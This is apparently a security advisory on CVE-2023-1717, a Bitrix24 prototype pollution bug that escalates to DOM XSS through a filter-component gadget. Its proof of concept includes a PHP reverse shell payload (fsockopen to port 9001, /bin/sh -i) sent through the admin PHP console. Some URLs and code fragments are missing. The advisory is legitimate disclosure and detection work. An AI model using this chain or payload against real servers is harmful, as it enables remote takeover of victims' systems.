Product | Bitrix24 |
Vendor | Bitrix24 |
Severity | Critical |
Affected Versions | Bitrix24 22.0.300 (latest version as of writing) |
Tested Versions | Bitrix24 22.0.300 (latest version as of writing) |
CVE Identifier | CVE-2023-1717 |
CVE Description | Prototype pollution in bitrix/templates/bitrix24/components/bitrix/menu/left_vertical/script.js in Bitrix24 22.0.300 allows remote attackers to execute arbitrary JavaScript code in the victim’s browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via polluting __proto__[tag] and __proto__[text] . |
CWE Classification(s) | CWE-1321 Prototype Pollution; CWE-79 Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) |
CAPEC Classification(s) | CAPEC-588 DOM-Based XSS |
Base Score: 9.6 (Critical)
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
Metric | Value |
Attack Vector (AV) | Network |
Attack Complexity (AC) | Low |
Privileges Required (PR) | None |
User Interaction (UI) | Required |
Scope (S) | Changed |
Confidentiality (C) | High |
Integrity (I) | High |
Availability (A) | High |
This report presents information on a client-side prototype pollution vulnerability present in the core.js
JavaScript file that is included in almost every Bitrix24 page. On certain pages, prototype pollution gadgets are available, allowing an attacker to execute arbitrary JavaScript code on the browser of any victim that visits the affected page. If the victim has administrator permissions, an attacker may leverage the built-in “PHP Command Line” feature to execute arbitrary system commands on the target web server.
The current page’s URL is parsed with the main_core.Uri
constructor on line 2144 in bitrix/templates/bitrix24/components/bitrix/menu/left_vertical/script.js
, which is included on every page with a left vertical menu. As this menu is a core component, almost every page on Bitrix24 is affected.
babelHelpers.classPrivateFieldSet(this, _actualLink, new main_core.Uri(window.location.href));
The Uri
constructor then calls the parseUrl
// bitrix/js/main/core/core.js lines 10168 to 10171
function Uri(url = '') {
babelHelpers.classCallCheck(this, Uri);
map.set(this, parseUrl(url));
The parseUrl
JavaScript function is used to parse URLs into their components.
// bitrix/js/main/core/core.js lines 10082 to 10105
const urlExp = /^((\w+):)?(\/\/((\w+)?(:(\w+))?@)?([^\/\?:]+)(:(\d+))?)?(\/?([^\/\?#][^\?#]*)?)?(\?([^#]+))?(#(\w*))?/;
function parseUrl(url) {
const result = url.match(urlExp);
if (Type.isArray(result)) {
const queryParams = parseQuery(result[14]);
return {
useShort: /^\/\//.test(url),
href: result[0] || '',
schema: result[2] || '',
host: result[8] || '',
port: result[10] || '',
path: result[11] || '',
query: result[14] || '',
hash: result[16] || '',
username: result[5] || '',
password: result[7] || '',
origin: result[8] || ''
return {};
The query string is further parsed by the parseQuery
// bitrix/js/main/core/core.js lines 10062 to 10080
function parseQuery(input) {
if (!Type.isString(input)) {
return {};
const url = input.trim().replace(/^[?#&]/, '');
if (!url) {
return {};
return url.split('&').reduce((acc, param) => {
const [key, value] = param.replace(/\+/g, ' ').split('=');
const keyFormat = getKeyFormat(key);
const formatter = getParser(keyFormat);
formatter(key, value, acc);
return acc;
}, {});
For certain query parameter keys, additional parsing is performed.
The format of these keys is determined by the getKeyFormat
// bitrix/js/main/core/core.js lines 10050 to 10060
function getKeyFormat(key) {
if (/^\w+\[([\w]+)\]$/.test(key)) {
return 'index';
if (/^\w+\[\]$/.test(key)) {
return 'bracket';
return 'default';
If the key is of the form aaa[bbb]
, the format returned will be index
. We will focus on this type of key for the rest of the report.
Parsing is then performed by the formatter returned by getParser
// bitrix/js/main/core/core.js lines 10005 to 10048
function getParser(format) {
switch (format) {
case 'index':
return (sourceKey, value, accumulator) => {
const result = /\[(\w*)\]$/.exec(sourceKey); // [1]
const key = sourceKey.replace(/\[\w*\]$/, ''); // [2]
if (Type.isNil(result)) {
accumulator[key] = value;
if (Type.isUndefined(accumulator[key])) {
accumulator[key] = {};
accumulator[key][result[1]] = value; // [3]
case 'bracket':
// parse bracket style keys
// parse default style keys
The getParser
returns a function that, when passed a sourceKey
and the value
corresponding to that key, parses the key and adds it to the JavaScript object accumulator
As the attacker has control over the sourceKey
and value
parameters via the URL’s query string, they have control over the result
and key
variables as they are derived from sourceKey
via the regex in [1]
and [2]
An attacker could pollute the global JavaScript prototype by setting key
to __proto__
. For example, let sourceKey
be __proto__[bbb]
and value
be ccc
In [1]
, result
will be ['[bbb]', 'bbb']
, and in [2]
, key
will be __proto__
Therefore, in [3]
, accumulator['__proto__']['bbb']
will be set to ccc
. As the __proto__
property of a JavaScript object refers to the Object.prototype
shared by all JavaScript objects, the property bbb
with the value ccc
will now be present in all JavaScript objects.
On certain pages, the presence of a prototype pollution gadget in the BX.Main.Filter
component allows an attacker to execute arbitrary JavaScript code on the victim’s browser.
Upon page load and subsequent initialization of the filter component, the setPreset
function is called:
// bitrix/cache/js/s1/bitrix24/page_17c0769aa6008d4b7096462e823dd9d6/page_17c0769aa6008d4b7096462e823dd9d6_v1.js?1678346430206239
// sourcemapped to script.js, lines 2507 to 2581
function setPreset(presetData) {
var container = this.getContainer();
var square, squares;
var squaresResult;
if (BX.type.isPlainObject(presetData)) {
squares = BX.Filter.Utils.getByClass(container, this.parent.settings.classSquare, true);
presetData = BX.clone(presetData);
presetData.ADDITIONAL = presetData.ADDITIONAL || [];
BX.onCustomEvent(window, 'BX.Filter.Search:beforeSquaresUpdate', [presetData, this]);
if (presetData.ID !== 'default_filter' && presetData.ID !== 'tmp_filter') {
square = BX.decl({ // [4]
block: 'main-ui-search-square',
name: presetData.TITLE,
value: presetData.ID,
isPreset: true
BX.prepend(square, container); // [5]
// ...
} else {
// ...
// ...
In [4]
a HTML element is constructed via the BX.decl
function, and in [5]
the resultant square
element is inserted into the DOM via the BX.prepend
is a simple wrapper over the BX.render
function, shown below:
// bitrix/js/main/core/core_decl.js lines 21 to 95
BX.render = function(item)
var element = null;
if (isBlock(item) || isTag(item))
var tag = 'tag' in item ? item.tag : 'div'; // [6]
var className = item.block;
var attrs = 'attrs' in item ? item.attrs : {};
var events = 'events' in item ? : {};
var props = {};
// Load props, atts and events
element = BX.create(tag, {props: props, attrs: attrs, events: events, children: children, html: text});
// ...
return element;
As the tag
property is not present on the object passed to BX.decl
and eventually BX.render
, the JavaScript engine checks if the property exists on the global object prototype. An attacker could use the prototype pollution vulnerability discussed earlier to set the tag
property to script
. The tag
property is accessed in [6]
and passed to the BX.create
function (shown below):
// bitrix/js/main/core/core.js lines 8931 to 8941
function create(tag, data = {}, context = document) {
let tagName = tag;
let options = data;
if (Type.isObjectLike(tag)) {
options = tag;
tagName = tag.tag;
return Dom.adjust(context.createElement(tagName), options);
The BX.create
function creates a HTML element according to the tag
parameter using document.createElement
and passes the element to Dom.adjust
// bitrix/js/main/core/core.js lines 8841 to 8920
function adjust(target, data = {}) {
if (!target.nodeType) {
return null;
let element = target;
if (target.nodeType === Node.DOCUMENT_NODE) {
element = target.body;
if (Type.isPlainObject(data)) {
// Initialize element attrs, event handlers, styles
if ('text' in data && !Type.isNil(data.text)) {
element.innerText = data.text; // [7]
return element;
if ('html' in data && !Type.isNil(data.html)) {
element.innerHTML = data.html;
return element;
As the text
property of the data
object is not present, an attacker could control this value via prototype pollution.
Therefore, by controlling the HTML element type by polluting the tag
property to script
and polluting the text
property with attacker controlled JavaScript, an attacker could execute arbitrary JavaScript on the user’s browser.
The PoC provided below targets the https://TARGET_HOST/workgroups/
page. However, any page that includes both the left vertical menu component and the BX.Main.Filter
component will be vulnerable.
Any user accessing the following URL will result in the anchor portion of the URL being base64 decoded and executed as JavaScript:
For example, if the anchor is
which is a base64 encoded version of
'Content-Type': 'application/x-www-form-urlencoded'
body: new URLSearchParams({
query: `$sock=fsockopen("",9001);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);`,
ajax: "y",
and the user is an administrator, a reverse shell connection will be opened to
on port 9001.
An attacker does not require any permissions to carry out this attack. However, the victim needs to visit a specially crafted URL supplied by the attacker.
It is possible to detect the exploitation of this vulnerability by examining traffic logs to detect the presence of the string __proto__
in the query parameters of requests.
Lam Jun Rong & Li Jiantao of of STAR Labs SG Pte. Ltd. (@starlabs_sg)